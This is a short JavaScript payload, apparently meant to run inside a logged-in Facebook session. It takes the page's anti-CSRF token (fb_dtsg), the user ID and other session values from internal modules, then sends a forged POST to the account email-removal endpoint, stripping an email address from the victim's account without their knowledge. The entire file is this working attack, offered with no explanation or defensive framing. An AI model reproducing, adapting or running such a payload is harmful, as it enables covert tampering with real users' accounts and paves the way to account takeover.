var spinR = require(["SiteData"]).__spin_r;
var spinB = require(["SiteData"]).__spin_b;
var spinT = require(["SiteData"]).__spin_t;
var jazoest = "22014";
var fbdtsg = require(["DTSGInitData"]).token;
var userId = require(["CurrentUserInitialData"]).USER_ID;
var hsi = require(["SiteData"]).hsi;
var email = "hotmail";
var url = "https://www.facebook.com/settings/account/email/remove/";
var data = "privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjUzNzU2NzY0LCJjYWxsc2l0ZV9pZCI6NzU0NjM0MDg4NDIzMjc5fQ%3D%3D&contact="+email+"&__user="+userId+"&__a=1&__dyn=7xeUmBwjbg7ebwKheC1swgE98nwgU6C7UW3q327E2vzobohw5cx60Vo2Vwb-q1ew8y11wbG782CwnUaE7i0n2US1vwnEO0FE9kbxS2218w4wwZwaO2W0D83mwkE5G0zE5W0HUvw5rwSyES0gq0Lo6-&__csr=&__req=2&__hs=19140.BP%3ADEFAULT.2.0.0.0.&dpr=1&__ccg=EXCELLENT&__rev=1005599385&__s=we92ho%3Akondaf%3Aixv5pw&__hsi="+hsi+"&__comet_req=0&cquick=jsc_c_1d&cquick_token=AQ6vwBNXFQmBqwR3-no&ctarget=https%3A%2F%2Fwww.facebook.com&fb_dtsg="+fbdtsg+"&jazoest="+jazoest+"&lsd=siSnwmbKpF4FJ477keTbJZ&__spin_r="+spinR+"&__spin_b="+spinB+"&__spin_t=" + spinT;

fetch(url, {
    method: 'POST',
    body: data,
    headers: {
        'Content-Type': 'application/x-www-form-urlencoded'
    }
}).then(e => e.text()).then(e => {})
